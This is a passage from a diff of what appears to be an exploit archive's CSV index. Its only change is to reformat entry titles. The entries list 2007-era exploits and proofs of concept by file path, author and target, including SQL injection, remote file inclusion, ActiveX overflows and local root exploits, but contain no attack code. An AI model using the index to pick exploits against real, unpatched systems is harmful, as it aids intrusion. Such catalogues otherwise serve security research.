Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 -3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 +3834,platforms/php/webapps/3834.php,"YaPIG 0.95b - Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 @@ -3509,7 +3509,7 @@ id,file,description,date,author,platform,type,port 3851,platforms/multiple/dos/3851.c,"Multiple vendors - ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 -3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 +3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3855,platforms/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,php,webapps,0 3856,platforms/windows/local/3856.htm,"East Wind Software - (advdaudio.ocx 1.5.1.1) Local BoF Exploit",2007-05-05,shinnai,windows,local,0 3857,platforms/php/webapps/3857.txt,"vm watermark for gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",php,webapps,0 @@ -3527,12 +3527,12 @@ id,file,description,date,author,platform,type,port 3869,platforms/php/webapps/3869.txt,"Berylium2 2003-08-18 - (beryliumroot) Remote File Inclusion",2007-05-07,"ThE TiGeR",php,webapps,0 3870,platforms/php/webapps/3870.txt,"LaVague 0.3 - (printbar.php views_path) Remote File Inclusion",2007-05-08,kezzap66345,php,webapps,0 3871,platforms/multiple/dos/3871.html,"Opera 9.10 alert() Remote Denial of Service",2007-05-08,Dj7xpl,multiple,dos,0 -3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 +3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3873,platforms/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service",2007-05-08,shinnai,windows,dos,0 3874,platforms/php/webapps/3874.txt,"CGX 20050314 - (pathCGX) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3875,platforms/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - (path_local) Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 3876,platforms/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusion",2007-05-08,GoLd_M,php,webapps,0 -3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 +3877,platforms/windows/remote/3877.html,"IncrediMail IMMenuShellExt - ActiveX Control Buffer Overflow Exploit",2007-05-08,"Umesh Wanve",windows,remote,0 3878,platforms/php/webapps/3878.txt,"Miplex2 - (SmartyFU.class.php) Remote File Inclusion",2007-05-08,"ThE TiGeR",php,webapps,0 3879,platforms/php/webapps/3879.htm,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion Exploit",2007-05-09,GoLd_M,php,webapps,0 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 SetEvalExpiryDate SEH Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0 @@ -3545,14 +3545,14 @@ id,file,description,date,author,platform,type,port 3887,platforms/php/webapps/3887.pl,"TutorialCMS 1.00 - (search.php search) SQL Injection Exploit",2007-05-09,Silentz,php,webapps,0 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 - (.ras) Download/Execute Buffer Overflow Exploit (Win32)",2007-05-09,"Kristian Hermansen",windows,local,0 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0 -3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 +3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - RControl.dll Denial of Service",2007-05-10,shinnai,windows,dos,0 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 -3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0 +3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0 3894,platforms/php/webapps/3894.txt,"Original 0.11 - config.inc.php x[1] Remote File Inclusion",2007-05-10,GoLd_M,php,webapps,0 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,php,webapps,0 3896,platforms/php/webapps/3896.pl,"TaskDriver 1.2 Login Bypass/SQL Injection Exploit",2007-05-10,Silentz,php,webapps,0 3897,platforms/windows/local/3897.c,"eTrust Antivirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0 -3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 hpqvwocx.dll ActiveX Magview Overflow PoC",2007-05-11,callAX,windows,dos,0 +3898,platforms/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - hpqvwocx.dll ActiveX Magview Overflow PoC",2007-05-11,callAX,windows,dos,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 3900,platforms/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change Exploit",2007-05-11,Dj7xpl,php,webapps,0 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (phpThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0 @@ -3570,14 +3570,14 @@ id,file,description,date,author,platform,type,port 3914,platforms/asp/webapps/3914.txt,"BlogMe 3.0 - (archshow.asp var) SQL Injection",2007-05-13,gsy,asp,webapps,0 3915,platforms/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - (g_pcltar_lib_dir) Remote File Inclusion",2007-05-13,Mogatil,php,webapps,0 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow Exploit",2007-05-13,rgod,windows,remote,0 -3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode ActiveX Denial of Service",2007-05-13,shinnai,windows,dos,0 +3917,platforms/windows/dos/3917.html,"ID Automation Linear Barcode - ActiveX Denial of Service",2007-05-13,shinnai,windows,dos,0 3918,platforms/php/webapps/3918.txt,"phpAtm 1.30 - (downloadfile) Remote File Disclosure",2007-05-13,Ali.Mohajem,php,webapps,0 3919,platforms/php/webapps/3919.txt,"NagiosQL 2005 2.00 - (prepend_adm.php) Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0 3921,platforms/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow PoC",2007-05-14,shinnai,windows,dos,0 3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080 3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 -3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 +3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 3926,platforms/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service",2007-05-15,"Kristian Hermansen",windows,dos,0 3927,platforms/windows/remote/3927.html,"DeWizardX - (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0 @@ -3619,7 +3619,7 @@ id,file,description,date,author,platform,type,port 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 -3966,platforms/windows/remote/3966.php,"Pegasus ImagN ActiveX Control Remote Buffer Overflow Exploit",2007-05-21,rgod,windows,remote,0 +3966,platforms/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow Exploit",2007-05-21,rgod,windows,remote,0 3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote BoF Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 @@ -3632,7 +3632,7 @@ id,file,description,date,author,platform,type,port 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 -3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 +3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 3980,platforms/php/webapps/3980.pl,"Dokeos 1.6.5 - (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 3981,platforms/php/webapps/3981.php,"cpCommerce 1.1.0 - (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 @@ -3645,14 +3645,14 @@ id,file,description,date,author,platform,type,port 3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - (user.php id) SQL Injection Exploit",2007-05-25,Silentz,php,webapps,0 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - (root_prefix) Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 -3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 +3992,platforms/php/webapps/3992.txt,"FlaP 1.0b - (pachtofile) Remote File Inclusion",2007-05-25,"Mehmet Ince",php,webapps,0 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - (securelib) Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 -3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 +3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0 @@ -3661,7 +3661,7 @@ id,file,description,date,author,platform,type,port 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 -4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 +4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component Denial of Service",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote BoF",2007-05-30,shinnai,windows,dos,0 @@ -3700,8 +3700,8 @@ id,file,description,date,author,platform,type,port 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos,0 4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 -4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 -4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 +4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 +4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - (.lst) Local Buffer Overflow Exploit",2007-06-08,n00b,windows,local,0 4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 @@ -3873,14 +3873,14 @@ id,file,description,date,author,platform,type,port 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injection",2007-07-25,bypass,php,webapps,0 4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 -4227,platforms/windows/dos/4227.php,"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 +4227,platforms/windows/dos/4227.php,"PHP - php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 -4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 +4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server - Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - (pfs.php) Remote File Upload",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 @@ -4012,13 +4012,13 @@ id,file,description,date,author,platform,type,port 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 -4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 +4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect eng50.dll - Remote Stack Overflow Exploit",2007-09-06,devcode,windows,remote,0 4368,platforms/php/webapps/4368.txt,"phpMytourney - (menu.php) Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC",2007-09-06,shinnai,windows,dos,0 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - (start.php) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 -4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 +4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote BoF PoC",2007-09-07,shinnai,windows,dos,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,php,webapps,0 4375,platforms/windows/dos/4375.txt,"BaoFeng2 - Mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 @@ -4073,7 +4073,7 @@ id,file,description,date,author,platform,type,port 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit",2007-09-18,nexen,php,webapps,0 4426,platforms/hardware/dos/4426.pl,"Airsensor M520 HTTPD Remote Preauth DoS / BoF PoC",2007-09-18,"Alex Hernandez",hardware,dos,0 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 -4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 +4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 CYFT Object - Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit",2007-09-19,shinnai,windows,local,0 @@ -4124,7 +4124,7 @@ id,file,description,date,author,platform,type,port 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - index.php Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4477,platforms/php/webapps/4477.txt,"php wcms XT 0.0.7 - Multiple Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4478,platforms/linux/remote/4478.c,"smbftpd 0.96 SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 -4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD CreateNewFile Arbitrary Remote Rewrite DoS",2007-10-01,rgod,windows,dos,0 +4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD CreateNewFile - Arbitrary Remote Rewrite DoS",2007-10-01,rgod,windows,dos,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Remote Blind SQL Injection Exploit",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps,0 @@ -4172,7 +4172,7 @@ id,file,description,date,author,platform,type,port 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 -4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 +4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - (IsisScript) Local File Disclosure / XSS",2007-10-13,JosS,cgi,webapps,0 4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 @@ -4234,11 +4234,11 @@ id,file,description,date,author,platform,type,port 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 -4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 +4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 -4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 +4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 @@ -4264,9 +4264,9 @@ id,file,description,date,author,platform,type,port 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script - product_desc.php SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 -4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 +4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps,0 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 - bbcodeSource.php Remote File Inclusion",2007-11-12,p4sswd,php,webapps,0 -4622,platforms/php/webapps/4622.txt,"Myspace Clone Script SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 +4622,platforms/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injection",2007-11-14,k1tk4t,php,webapps,0 4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow Proof of Concept",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 @@ -4277,7 +4277,7 @@ id,file,description,date,author,platform,type,port 4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 -4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 +4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 